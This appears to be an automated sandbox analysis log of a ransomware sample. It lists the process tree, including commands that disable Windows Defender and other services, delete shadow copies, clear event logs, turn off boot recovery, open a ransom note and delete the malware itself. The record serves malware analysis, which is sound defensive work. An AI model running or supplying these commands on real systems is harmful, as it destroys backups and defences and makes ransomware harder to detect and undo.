fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 900 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 744 wrote to memory of 1076 744 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:848
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:628
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1108
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:964
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1640
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1252
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1860
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1500
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1548
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:868
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:588
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1760
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:900
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1076
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1596
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:268
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1012
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1364
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1352
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:964
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1828
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2040
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1484
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1476
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1436
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1732
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1752
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1676
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1584
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1664
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1228
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1108
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1620
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1252
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1860
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:480
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:916
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1064
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:324
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:468
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1792
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:968
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1280
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:788
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1008
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1704
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1356 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1628
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1500 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1916 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:328 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:428 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2076 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2100 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2120
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2140 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2152
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2172 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2264 -
C:\Windows\system32\notepad.exenotepad.exe C:\4a7Z_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2644 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"2⤵PID:2652
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2676
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
e8581e1c0975e92f67bf014e1e1adb97
SHA122b2946186cdfbd125da2de12550df1394b6548e
SHA256b5a8f263eaf410d0353d41f31c68080dcc3ac5f6272de7970b23f0b47e55cfd6
SHA512cc2ec7f112a1629d47687dfb41988404a107ec79644f222121478ce0134e0f6410d6496988e45b681f463ba71d56666afc2355f92a10501e9c094bc4665085ae
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD583496c4d15bce978d48adfed8fe5b24d
SHA1b2053c07f8f4a8028473f80717bf83befc059edd
SHA256d9aa188d7735b48f0071c28548977545b6e8bf001ac6132bcf7c2340ca347ae4
SHA5121f1bef015933cb3b1ec1a60211a40e09c58d0a1b562c96e55d5851c1a5c2815cac2b3c847d66b935adf97fb74d1f0863a5a4fc7c29fe47395f81f8006a1681a0